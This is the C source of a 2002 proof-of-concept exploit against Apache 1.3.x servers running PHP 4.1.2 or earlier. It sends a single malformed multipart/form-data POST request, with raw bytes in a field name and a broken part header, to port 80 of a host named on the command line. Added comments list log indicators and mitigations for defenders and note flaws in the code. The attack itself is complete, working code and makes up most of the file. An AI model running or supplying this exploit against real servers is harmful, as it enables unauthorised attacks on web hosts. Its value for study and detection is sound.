/*

x_php_for_php.4.1.2.c

Author: alert7 < alert7@xfocus.org >
web: http://www.xfocus.net/ http://www.whitecell.org
2002-3-6

[notes]
This is a proof-of-concept exploit for Apache/1.3.x (or IIS, but not tested) with PHP 4.1.2 and earlier.

[References]
Gabriel A. Maggiotti http://qb0x.net/exploits/apache_php.c 
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>


/*
 * Proof-of-concept client: fills one fixed HTTP POST template
 * (multipart/form-data) and sends it to TCP port 80 of the host named in
 * argv[1], requesting the path given in argv[2]. No response is read; the
 * socket is closed straight after the send.
 *
 * Returns 0 once the request has been handed to send(). Exits with status 1
 * on a usage, name-lookup, socket or connect error, and with status 0 when
 * send() fails.
 *
 * Defender notes (drawn from the request template below):
 *  - The request is recognisable by a multipart part whose form-field name
 *    holds the raw bytes 0x10 0x85 0x79 0x90, by a Content-Disposition line
 *    that runs straight into "Content-Type:" with no line break, and by a
 *    Content-Length that is a fixed literal rather than the body size.
 *  - The User-Agent, Accept-Language, boundary token and filename are also
 *    fixed strings, so they are usable as low-confidence log indicators.
 *  - Presumably this targets PHP's multipart (file upload) request parsing;
 *    the file does not say which flaw - confirm against the vendor advisory.
 *    Mitigation is to run a PHP release newer than the range the file header
 *    lists as affected, and to set file_uploads = Off in php.ini where
 *    uploads are not needed.
 */
int main(int argc,char *argv[])
{
	int sockfd;
	char genbuf[4096];

	/*
	 * Request template. The two %s conversions receive the request path
	 * (argv[2]) and the Host header value (argv[1]), in that order.
	 * Content-Length is the literal 236; it is not computed from the body.
	 * NOTE(review): a string literal that spans raw newlines is not valid
	 * ISO C; this listing relies on an old compiler extension.
	 */
	char HTTP_HEAD[] =
"POST %s HTTP/1.1
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d2155311405aa
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: %s
Content-Length: 236
Connection: Keep-Alive
Cache-Control: no-cache

-----------------------------7d2155311405aa
 Content-Disposition: form-data;name=\"\x10\x85\x79\x90\";filename=\"C:\\alert7.txt\"Content-Type: text/plain";
	/*
	 * The body above is a single, unterminated multipart part: there is no
	 * closing boundary line, and the part header names the field with four
	 * raw bytes and the file as C:\alert7.txt.
	 */

	struct hostent *he;
	struct sockaddr_in their_addr;

	/* Exactly two arguments are required: target hostname and PHP path. */
	if(argc!=3)
	{
		fprintf(stderr,"usage:%s <hostname> <php_file>\n",argv[0]);
		exit(1);
	}
	
	/*
	 * Build the request. The size passed is one less than the buffer and
	 * the last byte is then zeroed. snprintf's return value is not checked,
	 * so over-long arguments are truncated silently.
	 */
	snprintf(genbuf,4096-1,HTTP_HEAD,argv[2],argv[1]);
	genbuf[4096-1]=0;

	/*
	 * Resolve the hostname.
	 * NOTE(review): gethostbyname reports failure through h_errno, not
	 * errno, so the perror text may not describe the real cause.
	 */
	if((he=gethostbyname(argv[1]))==NULL)
	{
		perror("gethostbyname");
		exit(1);
	}


	/* Plain IPv4 TCP socket. */
	if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1) {
		perror("socket"); exit(1);
	}

	/* Destination: port 80 (hard-coded) on the first address returned. */
	their_addr.sin_family=AF_INET;
	their_addr.sin_port=htons(80);
	their_addr.sin_addr=*((struct in_addr*)he->h_addr);
	bzero(&(their_addr.sin_zero),8);

	/* The address length passed is sizeof(struct sockaddr). */
	if( connect(sockfd,(struct sockaddr*)&their_addr,\
		 sizeof(struct sockaddr))==-1)
	{
		perror("connect");
		exit(1);
	}

	
	/*
	 * One send() of the formatted request up to its first NUL byte. Only
	 * -1 is checked, so a short send goes unnoticed.
	 * NOTE(review): the failure path exits with status 0, unlike every
	 * other error path in this function.
	 */
	if( send(sockfd,genbuf,strlen(genbuf),0) ==-1)
	{
		perror("send");
		exit(0);
	}

	/* Close without reading any reply from the server. */
	close(sockfd);

return 0;
}